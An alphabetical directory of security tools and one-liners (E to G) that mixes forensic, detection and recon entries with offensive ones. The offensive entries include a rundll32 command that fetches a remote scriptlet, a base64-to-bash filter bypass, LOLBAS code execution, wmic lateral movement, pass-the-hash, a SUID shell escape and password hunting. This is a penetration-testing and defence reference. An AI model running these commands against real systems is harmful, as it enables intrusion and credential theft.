The SIEM and endpoint-security layer built on the Elastic Stack — detection rules, timeline investigation and case management on top of whatever logs and Elastic Agent/Beats data are already being shipped.

visit → added by THUGS(red)

ElastiFlow tool

Blue Team Network

NetFlow/sFlow/IPFIX analytics built on the Elastic Stack — ships flow data into Elasticsearch with ready-made dashboards for network traffic visibility.

visit → added by THUGS(red)

Elcomsoft Phone Breaker tool Windows

Blue Team Forensics Mobile

Commercial mobile forensics tool for acquiring iOS/iCloud and some Android/BlackBerry backups and keychains — widely used in lawful mobile device examinations.

visit → added by THUGS(red)

Empire tool

Offensive Payloads Red Team

Post-exploitation and C2 framework (PowerShell/Python/C# agents) maintained by BC Security after the original PowerShell Empire project was discontinued; ships with a large stager and module library.

./ps-empire server
visit → added by THUGS(red)

Encode a payload to defeat naive space/quote filtering one-liner Linux

CTF Red Team Web

Base64-wrapping a command and decoding it inline is a quick way past a filter that blocks certain characters in a command-injection point.

echo 'aWQ7d2hvYW1p' | base64 -d | bash
added by THUGS(red)

ent tool

Cryptography

Small statistical test suite measuring the randomness quality (entropy, chi-square, serial correlation) of a byte stream — a quick sanity check for whether a CTF crypto challenge's 'random' keystream actually is.

ent ciphertext.bin
visit → added by THUGS(red)

Enumerate an open Google Cloud Storage bucket over the public JSON API one-liner

Cloud Recon

GCS exposes bucket listings over a plain JSON endpoint; a misconfigured bucket returns its full object list to an unauthenticated request.

curl -s "https://storage.googleapis.com/storage/v1/b/target-bucket/o" | jq "."
visit → added by THUGS(red)

Enumerate installed AV/EDR via WMI one-liner Windows

Enumeration Red Team

The SecurityCenter2 namespace lists every registered antivirus product, which shapes what evasion, if any, is even relevant.

Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | Select-Object displayName, productState
added by THUGS(red)

Enumerate Linux file capabilities one-liner Linux

Enumeration Red Team

A binary with cap_setuid or cap_sys_admin set as a file capability can escalate privileges exactly like a SUID bit, without the bit itself being set.

getcap -r / 2>/dev/null
added by THUGS(red)

Enumerate scheduled tasks (PowerShell native) one-liner Windows

Blue Team Enumeration

Get-ScheduledTask surfaces the same data as schtasks /query but is easier to filter and pipe into further checks.

Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | Select-Object TaskName, TaskPath, State
added by THUGS(red)

Enumerate services and their running account one-liner Windows

Enumeration Red Team

A service running as LocalSystem with a weak ACL or a hijackable binary path is the bread and butter of Windows local privesc.

Get-WmiObject win32_service | Select-Object Name, StartName, PathName, State | Sort-Object StartName
added by THUGS(red)

Enumerate subdomains via crt.sh certificate transparency logs one-liner

DNS OSINT Recon

Pulls every certificate-transparency-logged hostname for a domain straight from crt.sh's JSON API, no browser needed.

curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r ".[].name_value" | sort -u
visit → added by THUGS(red)

Enumerate system-wide LaunchDaemons one-liner macOS

Blue Team Enumeration Forensics

LaunchDaemons run as root at boot regardless of login, so an unfamiliar one here is a higher-severity find than a user LaunchAgent.

ls -la /Library/LaunchDaemons
plutil -p /Library/LaunchDaemons/*.plist
added by THUGS(red)

Enumerate unquoted service binary paths one-liner Windows

Enumeration Red Team

A service path with a space and no quotes lets Windows try each intermediate directory in turn; dropping a binary in the right one hijacks the service.

wmic service get name,pathname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """"
added by THUGS(red)

Enumerate user LaunchAgents one-liner macOS

Blue Team Enumeration Forensics

Per-user LaunchAgents run at login without needing root, making them the most common macOS persistence location for malware and legitimate tools alike.

ls -la ~/Library/LaunchAgents
plutil -p ~/Library/LaunchAgents/*.plist
added by THUGS(red)

Epieos tool

OSINT Research

Email OSINT tool that checks a target address against Google, Skype, Amazon and other services to reveal linked account names, profile photos and registration status.

visit → added by THUGS(red)

Eric Zimmerman's Tools (EZ Tools) tool Windows

Blue Team Forensics

A suite of free, individually-focused Windows forensic parsers — Registry Explorer, MFTECmd, EvtxECmd, PECmd (prefetch), Timeline Explorer and more — that between them cover most Windows artifact types KAPE collects.

MFTECmd.exe -f "$MFT" --csv out\
visit → added by THUGS(red)

Ettercap tool Linux

MITM Network Red Team

A long-standing comprehensive suite for man-in-the-middle attacks on a LAN — live connection sniffing, ARP poisoning and content filtering, with both a CLI and a GUI.

ettercap -T -M arp:remote /10.10.10.1// /10.10.10.10//
visit → added by THUGS(red)

Evil-WinRM tool

Offensive Red Team

The standard WinRM shell for penetration testing — a full interactive PowerShell-like session over WinRM, with upload/download and Kerberos/pass-the-hash support built in.

evil-winrm -i 10.10.10.10 -u Administrator -H <ntlm-hash>
visit → added by THUGS(red)

EvilClippy tool

Payloads Red Team

Crafts malicious MS Office documents — hides VBA macros, tricks analysis tools that assume Windows-only olevba parsing, and stomps VBA p-code to hide source from AV.

EvilClippy.exe -s fake_macro.vba template.xls
visit → added by THUGS(red)

EvtxECmd tool Windows

Blue Team Forensics

Eric Zimmerman's EVTX parser — turns Windows Event Logs into CSV/JSON/timeline output with maps for common event IDs, much faster than the native Event Viewer for bulk triage.

EvtxECmd.exe -f Security.evtx --csv out --csvf security.csv
visit → added by THUGS(red)

Execute a command on a remote host with wmic /node one-liner Windows

LOLBAS / LOTL Red Team

A dependency-free lateral movement primitive once credentials for the target are already known, no PsExec binary required.

wmic /node:"10.10.10.5" /user:"DOMAIN\admin" process call create "cmd.exe /c whoami > C:\Windows\Temp\out.txt"
visit → added by THUGS(red)

Execute a command with forfiles one-liner Windows

LOLBAS / LOTL Red Team

forfiles.exe passes an arbitrary command to /c, a built-in binary that quietly runs code and is easy to overlook in a LOLBAS sweep.

forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c calc.exe"
visit → added by THUGS(red)

Execute a scriptlet with MSBuild one-liner Windows

LOLBAS / LOTL Red Team

MSBuild.exe ships with the .NET framework and will run inline tasks embedded in a project file, bypassing simple AppLocker rules.

MSBuild.exe payload.csproj
visit → added by THUGS(red)

Execute code via InstallUtil one-liner Windows

LOLBAS / LOTL Red Team

InstallUtil.exe runs the Uninstall-decorated method of a .NET assembly, a signed-binary execution path that predates most AppLocker rulesets.

InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
visit → added by THUGS(red)

Execute code via Regasm one-liner Windows

LOLBAS / LOTL Red Team

The COM-registration utility runs a marked class constructor from a signed .NET assembly, another AppLocker-friendly LOLBAS binary.

Regasm.exe /U payload.dll
visit → added by THUGS(red)

Execute JScript via rundll32 one-liner Windows

LOLBAS / LOTL Red Team

rundll32.exe can invoke a remote scriptlet through the mshtml/advpack chain, another built-in binary that executes attacker script.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://10.10.14.7/payload.sct")
visit → added by THUGS(red)

Exeinfo PE tool Windows

Binary / RE Blue Team Malware

Lightweight PE packer/compiler signature scanner with built-in unpacker scripts for common packers — a quick first pass before deeper static analysis.

visit → added by THUGS(red)

exiftool tool

CTF Forensics OSINT

Reads, writes and edits metadata across an enormous range of file formats — the standard tool for pulling (or stripping) EXIF, GPS and authorship data out of files.

exiftool suspicious.jpg
visit → added by THUGS(red)

Explainshell tool

Cheat Sheets

Pastes a shell command and breaks down what every flag and pipe segment does against the real man page — handy for decoding an unfamiliar one-liner found in a writeup or a payload.

visit → added by THUGS(red)

exploit.education tool

Binary / RE CTF Research

Series of downloadable VM-based wargames (Phoenix, Nebula, Fusion and others) teaching binary exploitation fundamentals step by step.

visit → added by THUGS(red)

Export and query an EVTX file offline without a live host one-liner Windows

Blue Team Forensics

Runs an XPath query straight against an exported .evtx file with the built-in wevtutil, no PowerShell EVTX cmdlets or third-party parser required.

wevtutil qe Security.evtx /lf:true /q:"*[System[(EventID=4688)]]" /f:text > logons.txt
added by THUGS(red)

Extract IOCs (IPs and domains) out of a log or report file one-liner

Blue Team Forensics Malware

Pulls every IPv4 address and FQDN-looking string out of an arbitrary text blob (a vendor report, a phishing email, a log dump) for quick pivoting into a threat-intel lookup.

grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' report.txt | sort -u
grep -oE '\b[a-z0-9.-]+\.[a-z]{2,}\b' report.txt | sort -u
added by THUGS(red)

Extract strings for hardcoded secrets from a binary one-liner Linux

Binary / RE Forensics

strings piped through a targeted grep is still the fastest way to spot an embedded API key, password or URL in an unfamiliar binary.

strings -n 8 ./binary | grep -iE 'password|api[_-]?key|token|http://|https://'
added by THUGS(red)

EyeWitness tool Linux

Recon Red Team Web

Takes screenshots of a large list of web services and organises them into a browsable report — the fastest way to triage which of a thousand open ports is actually worth looking at by hand.

eyewitness --web -f urls.txt -d report/
visit → added by THUGS(red)

Facedancer tool

Fuzzing Hardware

Python framework (with GoodFET/GreatFET/Cynthion hardware backends) for emulating arbitrary USB devices in software, used to fuzz host USB stacks/drivers or spoof a device a host expects.

visit → added by THUGS(red)

FactorDB tool

Cryptography CTF

Public database of pre-computed integer factorizations — before spinning up a sieve, check whether someone already factored the exact RSA modulus a challenge gave you.

visit → added by THUGS(red)

Fail2ban tool Linux

Blue Team Defensive Network

The long-standing log-watching intrusion prevention daemon — matches patterns like repeated failed SSH logins in a log file and reacts by firewalling the offending IP, no agent or cloud dependency required.

fail2ban-client status sshd
visit → added by THUGS(red)

FakeNet-NG tool Windows

Blue Team Malware Network

Mandiant's next-gen network simulation tool for dynamic malware analysis — intercepts and fakes DNS/HTTP/HTTPS/SSL traffic on the analysis host itself, no separate VM needed.

fakenet.exe
visit → added by THUGS(red)

Falco tool Linux

Blue Team Cloud Defensive

A CNCF runtime security tool for containers and Kubernetes — watches kernel syscalls against a rule set to detect unexpected process execution, privilege escalation and file access inside running workloads.

visit → added by THUGS(red)

FamilyTreeNow tool

OSINT

Free genealogy-oriented people search that surfaces relatives, associates and address history from public genealogical and property records.

visit → added by THUGS(red)

FastIR Collector tool Windows

Blue Team Forensics

Lightweight standalone Windows live-response collector — pulls processes, network connections, services, scheduled tasks and registry artifacts into a single CSV bundle.

visit → added by THUGS(red)

FastPeopleSearch tool

OSINT

Free US people-search aggregator similar in scope to TruePeopleSearch, drawing on the same class of public-record data brokers.

visit → added by THUGS(red)

fcrackzip tool

Brute Force CTF Hashing

Brute-force and dictionary password cracker for ZipCrypto-protected archives — the go-to before reaching for bkcrack's known-plaintext approach.

fcrackzip -u -D -p rockyou.txt secret.zip
visit → added by THUGS(red)

FeatherDuster tool

Cryptography CTF

NCC Group's automated cryptanalysis tool — feeds ciphertext through a battery of checks for weak or misused crypto (ECB, small keyspace, XOR, RSA flaws) rather than guessing by hand.

python featherduster.py
visit → added by THUGS(red)

Fenrir tool Linux

Blue Team Defensive Malware

A dependency-free bash IOC scanner in the same family as Loki — checks hashes, filenames, string matches and suspicious permissions against a simple indicator list, for hosts where nothing heavier can be installed.

./fenrir.sh /path/to/scan
visit → added by THUGS(red)

Feodo Tracker tool

Blue Team Malware Network

abuse.ch's tracker for Emotet/Dridex/QakBot/TrickBot-family botnet C2 servers — publishes a live blocklist of active C2 IPs.

visit → added by THUGS(red)

feroxbuster tool

Fuzzing Red Team Web

A fast, recursive content-discovery tool written in Rust — automatically dives into discovered directories without needing to be re-run manually, unlike gobuster/dirb.

feroxbuster -u https://target.tld -w wordlist.txt -x php,html,txt
visit → added by THUGS(red)

Fetch a domain's RDAP record and pretty-print the useful fields one-liner

DNS Recon

RDAP is the structured-JSON successor to WHOIS; rdap.org routes the query to the right registry and hands back machine-readable output.

curl -s https://rdap.org/domain/example.com | jq ".events, .entities"
visit → added by THUGS(red)

ffuf tool

CTF Fuzzing Web

A fast web fuzzer written in Go — content discovery, virtual-host fuzzing and parameter fuzzing, all through one flexible FUZZ-keyword syntax.

ffuf -u http://target/FUZZ -w wordlist.txt -mc all -fc 404
visit → added by THUGS(red)

Fibratus tool Windows

Blue Team Defensive

A Windows kernel-level observability and detection tool — captures and filters the raw kernel event stream (process, file, registry, network) with its own filtering expression language, built for host-based threat hunting.

fibratus run kevt.name = 'CreateProcess'
visit → added by THUGS(red)

Fierce tool

DNS Enumeration Recon

A DNS reconnaissance tool that locates non-contiguous IP space and hostnames against a target domain — zone transfer attempts, wordlist-based subdomain brute-forcing and reverse lookups to map a domain's DNS footprint.

fierce --domain example.com
visit → added by THUGS(red)

file tool

CTF Forensics

Identifies a file's actual type by inspecting its content (magic bytes) rather than trusting its extension — the very first command to run on anything unidentified.

file suspicious.bin
visit → added by THUGS(red)

find — spawn a shell from an unexpected SUID binary one-liner Linux

CTF LOLBAS / LOTL Red Team

A GTFOBins classic: find's -exec flag runs an arbitrary command, so a SUID find binary hands you a root shell outright.

find . -exec /bin/sh -p \; -quit
visit → added by THUGS(red)

Find and read PowerShell console history one-liner Windows

Enumeration Forensics

ConsoleHost_history.txt often has the last few commands an admin ran, credentials and all, worth checking before assuming a box is a dead end.

Get-Content (Get-PSReadlineOption).HistorySavePath
added by THUGS(red)

Find capability-bearing interpreters one-liner Linux

Enumeration Red Team

A python or perl interpreter carrying cap_setuid, whether via file capability or SUID, is functionally a root shell one command away.

getcap -r / 2>/dev/null | grep -Ei 'python|perl|ruby'
added by THUGS(red)

find every SUID binary on the box one-liner Linux

CTF Enumeration Red Team

A one-liner CTF/OSCP staple: lists every SUID-bit binary on the filesystem, which you then cross-reference against GTFOBins for a breakout primitive.

find / -perm -4000 -type f 2>/dev/null
visit → added by THUGS(red)

Find files modified in the last hour one-liner Linux

Blue Team Forensics

On a box recently compromised or patched, files touched in the last hour are the fastest lead into what actually changed.

find / -xdev -mmin -60 -type f 2>/dev/null | grep -v -E '^/(proc|sys)'
added by THUGS(red)

Find files with no owner one-liner Linux

Enumeration Forensics

Orphaned files, from a deleted user or a broken container mount, sometimes carry permissions from a since-removed privileged account.

find / -xdev \( -nouser -o -nogroup \) 2>/dev/null
added by THUGS(red)

Find hidden files outside home directories one-liner Linux

Enumeration Forensics

A dotfile dropped outside the usual home-directory locations is a common, low-effort way malware hides its working directory.

find / -xdev -name ".*" -not -path "/home/*/.*" -not -path "/proc/*" 2>/dev/null
added by THUGS(red)

Find new local admin group membership events one-liner Windows

Blue Team Defensive Forensics

Surfaces 4732/4728 (member added to a security-enabled local/global group) events — the classic signal for privilege escalation via group membership abuse.

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4732,4728} |
  Select-Object TimeCreated, Id, @{n='Member';e={$_.Properties[0].Value}}, @{n='Group';e={$_.Properties[2].Value}}
added by THUGS(red)

Find privileged running containers one-liner Linux

Cloud Enumeration Red Team

A container started with --privileged shares the full capability set of the host kernel, so code execution inside it is effectively code execution on the host.

docker ps --format '{{.ID}} {{.Names}}' | xargs -I{} docker inspect {} --format '{{.Name}}: Privileged={{.HostConfig.Privileged}}'
added by THUGS(red)

Find public S3 buckets in the current AWS account one-liner

Blue Team Cloud Enumeration

Cross-references bucket ACLs and policies for public access — the single most common AWS misconfiguration behind accidental data exposure.

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
tr '\t' '\n' | while read b; do
  aws s3api get-bucket-policy-status --bucket "$b" --query 'PolicyStatus.IsPublic' --output text 2>/dev/null | grep -q true && echo "PUBLIC: $b"
done
added by THUGS(red)

Find readable SSH private keys one-liner Linux

Enumeration Red Team

A world-readable id_rsa under any home directory is often worth more than any local exploit chain on the box.

find / -xdev \( -name 'id_rsa*' -o -name '*.pem' \) 2>/dev/null | xargs -r ls -la
added by THUGS(red)

Find recently modified plist files one-liner macOS

Blue Team Forensics

A plist edited outside a software update window is a strong signal of manual persistence tampering.

find /Library /System/Library ~/Library -name '*.plist' -mtime -7 2>/dev/null
added by THUGS(red)

Find SGID binaries one-liner Linux

Enumeration Red Team

Same idea as SUID but for group-inherited execution, checked less often and just as exploitable when misconfigured.

find / -perm -2000 -type f 2>/dev/null
added by THUGS(red)

Find SUID binaries one-liner Linux

Enumeration Red Team

The single most common first step in Linux privesc enumeration; any SUID binary outside a known-safe list is worth checking against GTFOBins.

find / -perm -4000 -type f 2>/dev/null
added by THUGS(red)

Find SUID/SGID binaries added outside package management one-liner Linux

Blue Team Defensive Forensics

Attacker-planted SUID binaries are a common Linux persistence/privesc trick; this lists every SUID/SGID file so you can eyeball it against a known-good baseline.

find / -xdev \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \; 2>/dev/null
added by THUGS(red)

Find world-writable files one-liner Linux

Enumeration Red Team

A world-writable file owned by root, or referenced by a privileged process, is a common and easy escalation vector.

find / -xdev -type f -perm -0002 2>/dev/null
added by THUGS(red)

find world-writable files owned by root one-liner Linux

CTF Enumeration Red Team

A file that root owns but anyone can write to is often the difference between a foothold and full compromise — this finds every one on the box.

find / -writable -user root -type f 2>/dev/null | grep -v "^/proc"
added by THUGS(red)

findcrypt-yara tool

Binary / RE Cryptography CTF

IDA/Ghidra plugin that scans a binary for known cryptographic constants (AES S-boxes, SHA/MD5 initialisation vectors, CRC tables) and flags exactly where a crypto routine sits.

visit → added by THUGS(red)

findomain tool

DNS Enumeration Recon

Fast Rust subdomain enumerator that queries certificate-transparency logs and multiple passive-DNS APIs, with an optional monitoring mode for new subdomains.

findomain -t example.com -o
visit → added by THUGS(red)

findstr — search a whole drive for a keyword, GUI-free one-liner Windows

CTF Enumeration Red Team

Built-in findstr recurses a directory tree grepping for a string — handy for hunting "password" in config files without installing anything.

findstr /si password *.txt *.config *.ini *.xml
added by THUGS(red)

FLARE FLOSS tool

Binary / RE CTF Malware

Mandiant's tool for extracting obfuscated/encoded strings from a binary by emulating the routines that decode them at runtime — surfaces strings plain `strings` cannot see.

floss ./chall
visit → added by THUGS(red)

FLARE-VM tool Windows

Blue Team Malware

Mandiant's Windows counterpart to REMnux — a scripted install of a full reverse-engineering and malware-analysis toolchain onto a fresh Windows VM, for analysing Windows malware in its native environment.

visit → added by THUGS(red)

Flashrom tool Linux

Hardware

Reads, writes and verifies SPI/parallel flash chips (BIOS/UEFI, router firmware, embedded device flash) with a wide range of cheap programmers, in-system or desoldered.

flashrom -p ch341a_spi -r backup.bin
visit → added by THUGS(red)

flask-unsign tool

Cryptography CTF Web

Decodes, brute-forces and re-signs Flask's itsdangerous-based session cookie, recovering the app's SECRET_KEY from a wordlist and letting you forge an arbitrary session.

flask-unsign --unsign --cookie "<session_cookie>" --wordlist rockyou.txt
visit → added by THUGS(red)

Fleet tool

Blue Team Defensive Enumeration

An open-source management layer for osquery — schedules queries, manages the agent fleet and turns raw osquery output into a usable device-inventory and detection tool at organisation scale.

visit → added by THUGS(red)

Flipper Zero tool

Hardware NFC / RFID Wireless / WiFi

Pocket multi-tool for RF/RFID/NFC/infrared/iButton with a Dolphin-themed UI — reads, emulates and replays sub-GHz, 125kHz LF and 13.56MHz HF tags, plus GPIO for basic hardware hacking.

visit → added by THUGS(red)

FLOSS tool

Blue Team Malware

FireEye Labs Obfuscated String Solver — automatically extracts stack strings, decoded strings and tight-loop-obfuscated strings that plain `strings` misses in packed/obfuscated malware.

floss malware.exe -o strings.txt
visit → added by THUGS(red)

FLOSS (FLARE Obfuscated String Solver) tool

Binary / RE Blue Team Malware

Mandiant's successor to plain `strings` for malware triage — statically emulates a binary just enough to decode stack strings, obfuscated strings and strings built at runtime that a normal string dump never reveals.

floss malware.exe
visit → added by THUGS(red)

FOFA tool

Device Search OSINT Recon Search Engines

Internet asset search engine (Huawei/Baimaohui-affiliated) with its own query syntax for finding hosts by banner, title, certificate or icon hash.

visit → added by THUGS(red)

foremost tool Linux

CTF Forensics

A file-carving tool that recovers files from a disk image or raw data stream based on headers and footers, independent of the filesystem metadata around them.

foremost -i disk.img -o carved/
visit → added by THUGS(red)

Forensically tool

Forensics OSINT

Browser-based image forensics toolkit (29a.ch) offering ELA, clone detection, noise analysis and metadata extraction without uploading the image anywhere.

visit → added by THUGS(red)

ForgeCert tool Windows

Offensive Red Team

GhostPack tool that forges "golden certificates" from a compromised AD CS CA private key, minting arbitrary user certificates even after the CA cert is rotated.

visit → added by THUGS(red)

FotoForensics tool

Forensics OSINT

Error Level Analysis and metadata forensics for a submitted photo, used to spot edited/composited regions and inconsistent compression history.

visit → added by THUGS(red)

fping tool

Enumeration Network

Parallel ping utility — sweeps a whole subnet for live hosts far faster than scripting individual ping calls, a first step in any network inventory.

fping -a -g 10.10.10.0/24 2>/dev/null
visit → added by THUGS(red)

fplll tool Linux

Cryptography

Lattice reduction library (LLL and BKZ) that underlies most CTF lattice attacks — Coppersmith's method, knapsack/subset-sum crypto, and small-root RSA attacks all reduce to a lattice problem this solves.

visit → added by THUGS(red)

fpylll tool

Cryptography

Python bindings for fplll, letting CTF crypto scripts build and reduce lattices directly instead of shelling out or reimplementing LLL from scratch.

visit → added by THUGS(red)

Frida tool

Binary / RE CTF Mobile

Dynamic instrumentation toolkit for injecting JavaScript into a running process to hook functions, dump traffic or bypass checks — as at home reversing a mobile app as a native binary.

frida -U -f com.target.app -l hook.js --no-pause
visit → added by THUGS(red)

FTK Imager tool Windows

Blue Team Forensics

Exterro's free disk-imaging and preview tool — creates forensically sound images (E01/dd), previews a live system's files and memory, and generates hashes for chain-of-custody, without needing the full FTK suite.

visit → added by THUGS(red)

Full Disclosure (seclists.org) tool

Research

Archived mirror of the Full Disclosure mailing list — unmoderated public vulnerability disclosure going back decades, searchable by keyword.

visit → added by THUGS(red)

FullHunt tool

Device Search Recon Search Engines

Attack-surface search engine and monitoring platform that continuously tracks a company's exposed hosts, subdomains and services.

visit → added by THUGS(red)

FuzzDB tool

Fuzzing Web Wordlists

Dictionaries of attack payloads and predictable filenames/paths for discovery and fuzzing (injection strings, common backup/config filenames, error-message patterns), maintained separately from SecLists.

visit → added by THUGS(red)

G-Scout tool

Blue Team Cloud Defensive

NCC Group's Google Cloud Platform security auditing tool — pulls IAM, network and resource configuration and highlights common GCP misconfigurations.

visit → added by THUGS(red)

GATTacker tool Linux

Hardware MITM Wireless / WiFi

Node.js BLE MITM/impersonation toolkit — scans and clones a target device's GATT profile so a fake peripheral can sit between a phone app and the real hardware.

node scan.js
visit → added by THUGS(red)

gau (GetAllUrls) tool

OSINT Recon Web

Fetches known URLs for a domain from the Wayback Machine, Common Crawl, AlienVault OTX and urlscan.io — a broader net than waybackurls alone.

echo target.tld | gau
visit → added by THUGS(red)

GCPBucketBrute tool

Brute Force Cloud

Enumerates Google Cloud Storage bucket names for a target and checks the current (or anonymous) credentials for read/write/delete access on anything found.

python3 gcpbucketbrute.py -k target
visit → added by THUGS(red)

GDB + GEF tool Linux

Binary / RE CTF

The GNU Debugger, and GEF — the plugin that turns it into a usable exploit-development environment with heap analysis, ASLR/PIE-aware context, and pwn-focused conveniences GDB alone doesn't have.

gdb -q ./binary
visit → added by THUGS(red)

GEF (GDB Enhanced Features) tool Linux

Binary / RE CTF Offensive

Another exploit-dev focused GDB plugin, with heap/format-string/ropper helpers and a large command set; the main alternative to pwndbg.

bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
visit → added by THUGS(red)

Generate and locate a cyclic pattern (pwntools) one-liner

Binary / RE CTF Offensive

Generates a De Bruijn-style non-repeating pattern to feed a crashing binary, then recovers the exact byte offset to the overwritten return address/register from the crash value.

python3 -c "from pwn import *; print(cyclic(200))"
# after the crash, recover the offset from the corrupted value:
python3 -c "from pwn import *; print(cyclic_find(0x6161616161616161))"
added by THUGS(red)

Genymotion tool

Mobile

Fast, configurable Android emulator built on VirtualBox/QEMU, popular for mobile app testing because it is quicker to snapshot/reset and easier to root than the stock AVD emulator.

visit → added by THUGS(red)

GeoSpy tool

OSINT Research

AI-assisted geolocation tool that estimates where a photo was taken from visual cues alone (terrain, signage, architecture) — a modern automation of manual geolocation OSINT.

visit → added by THUGS(red)

Ghidra tool

Binary / RE CTF

NSA's free, open-source software reverse-engineering suite — disassembler, decompiler and a scripting API, the free alternative most people reach for before IDA Pro.

visit → added by THUGS(red)

Ghostpack Seatbelt tool Windows

Enumeration Offensive Red Team

A C# host-survey tool that checks a huge list of security-relevant settings and artefacts in one pass — AV/EDR presence, patch level, AppLocker, credential-storage locations and more.

.\Seatbelt.exe -group=all
visit → added by THUGS(red)

GHunt tool

OSINT Recon

Google account OSINT tool that resolves a Gmail address to its Google ID, name, profile photo and exposure across Google services (Maps reviews, calendar, photos).

ghunt email [email protected]
visit → added by THUGS(red)

gifshuffle tool

CTF Steganography

Hides a message inside a GIF by shuffling its colour palette order rather than touching pixel data, leaving the visible image completely unchanged.

gifshuffle -p "password" cover.gif out.gif secret.txt
visit → added by THUGS(red)

GitHub Advisory Database tool

Research

GitHub's curated database of security advisories for open-source packages across major ecosystems (npm, PyPI, Maven, RubyGems, etc.), backing Dependabot alerts.

visit → added by THUGS(red)

GitHub code search + truffleHog one-liner

OSINT Recon Research

Scan a git repository's full history for accidentally committed secrets (API keys, tokens, credentials) rather than just the current checkout.

pip install trufflehog3
trufflehog3 https://github.com/org/repo.git
# or the Go rewrite, scanning a local clone including history:
trufflehog git file://./repo
visit → added by THUGS(red)

Glasgow Interface Explorer tool

Hardware

Open hardware/FPGA-based multi-protocol debug tool — a growing library of applets for talking, sniffing and glitching just about any low-speed digital interface (UART, SPI, I2C, JTAG, flash) from one board.

glasgow run uart -V 3.3 --pins-rx=0 --pins-tx=1
visit → added by THUGS(red)

glibc-all-in-one tool Linux

Binary / RE CTF

Downloads and builds any historical glibc version with debug symbols so a pwn exploit can be developed and tested against the exact libc the target ships.

./download.sh
./build.sh 2.31-0ubuntu9.9 amd64
visit → added by THUGS(red)

Glutton tool Linux

Blue Team Defensive Network

The Honeynet Project's generic low-interaction honeypot proxy — sits in front of any TCP port, logs every connection and can hand off to protocol-specific honeypots behind it, useful as a catch-all sensor across a whole address range.

visit → added by THUGS(red)

gmpy2 tool

Cryptography

Python bindings to GMP/MPFR/MPC for fast arbitrary-precision integer and rational arithmetic — nearly every from-scratch CTF crypto script leans on it instead of native Python ints for speed.

visit → added by THUGS(red)

GNU Radio tool

Hardware SDR / RF

A free software-defined-radio development toolkit — a flow-graph-based signal-processing framework that HackRF, RTL-SDR, BladeRF and USRP tooling is commonly built on top of.

visit → added by THUGS(red)

GoAccess tool Linux

Blue Team Forensics Network

Real-time terminal and browser web log analyzer — parses Apache/Nginx access logs on the fly for traffic, status codes and suspicious request patterns during an incident.

goaccess access.log -o report.html --log-format=COMBINED
visit → added by THUGS(red)

gobuster tool

Brute Force Fuzzing Web

A fast Go-based bruteforcer for directories/files, DNS subdomains, virtual hosts and S3 buckets — the everyday content-discovery default for a lot of testers.

gobuster dir -u http://target -w wordlist.txt -x php,txt,bak
visit → added by THUGS(red)

Google Alerts tool

OSINT Research

Free monitoring service that emails you whenever a new page matching a search term is indexed, used for ongoing passive monitoring of a target or brand.

visit → added by THUGS(red)

Google Hacking Database (GHDB) tool

Cheat Sheets OSINT Recon

Exploit-DB's long-running, categorised archive of Google dorks for finding exposed files, login portals, error messages and vulnerable systems via search-engine indexing.

visit → added by THUGS(red)

Google Scholar tool

Research Search Engines

General academic search engine widely used to trace citations of a security paper and find who has since built on or broken a given technique.

visit → added by THUGS(red)

GoPhish tool

Offensive Red Team

An open-source phishing-simulation platform for authorised security-awareness testing — campaigns, templates, landing pages and click/report tracking in one dashboard.

visit → added by THUGS(red)

gotator tool

DNS Recon Wordlists

Subdomain-permutation generator similar in purpose to altdns, with adjustable permutation depth and its own wordlist format.

gotator -sub subdomains.txt -perm permutations.txt -depth 1 -numbers 3
visit → added by THUGS(red)

gowitness tool

Recon Red Team Web

A Go-based web screenshot utility built for the same triage job as EyeWitness, using a headless Chrome for the capture and shipping as a single static binary.

gowitness scan file -f urls.txt
visit → added by THUGS(red)

gqrx tool Linux

Hardware SDR / RF

GNU Radio-based SDR receiver GUI for Linux/macOS with a waterfall display and the standard analog demodulators — a common first stop for exploring what a new SDR dongle can hear.

visit → added by THUGS(red)

gr-gsm tool Linux

Research SDR / RF

GNU Radio out-of-tree module for receiving and decoding GSM traffic with an SDR — the standard building block behind most "GSM sniffing with a $20 dongle" demos.

grgsm_livemon_headless -f 935.2M
visit → added by THUGS(red)

Grab every common DNS record type for a domain in one pass one-liner

Cheat Sheets DNS Recon

One loop instead of six separate dig invocations when you want the full picture of a domain's A/AAAA/MX/TXT/NS/SOA/CNAME records.

for t in A AAAA MX TXT NS SOA CNAME; do echo "== $t =="; dig +short example.com "$t"; done
added by THUGS(red)

GraphQL Voyager / InQL tool

Red Team Web

A Burp Suite extension (InQL) and standalone tooling for exploring and attacking GraphQL APIs — schema introspection, query generation and batching-attack helpers.

visit → added by THUGS(red)

GRASSMARLIN tool

Blue Team Hardware Network

NSA-released passive network mapping tool for ICS/SCADA environments — builds a topology map from captured traffic without sending any packets onto often-fragile OT networks.

visit → added by THUGS(red)

Graylog tool

Blue Team Defensive

A centralised log management platform built on Elasticsearch/OpenSearch and MongoDB — search, dashboards and alerting across every log source pointed at it, a common lighter-weight alternative to a full Elastic SIEM build.

visit → added by THUGS(red)

GreatFET One tool

Hardware

Great Scott Gadgets' general-purpose USB hardware hacking tool — GPIO, SPI, I2C, and a software-defined peripheral bus for talking to almost anything on a board over USB from a host script.

gf info
visit → added by THUGS(red)

Grep auth.log for a brute-force pattern one-liner Linux

Blue Team Forensics Network

Counts failed SSH password attempts per source IP from the system auth log — the fastest confirmation of a brute-force before reaching for fail2ban logs or a SIEM.

grep 'Failed password' /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn | head -20
added by THUGS(red)

Grep failed SSH login attempts one-liner Linux

Blue Team Forensics

Pulls every failed password attempt out of auth.log and ranks by source, the starting point for spotting a brute-force campaign.

grep 'Failed password' /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
added by THUGS(red)

Grep files for passwords with findstr one-liner Windows

Enumeration Red Team

The findstr equivalent of grep -r, useful on a box where the PowerShell execution policy blocks anything more elaborate.

findstr /si password *.txt *.ini *.config *.xml
added by THUGS(red)

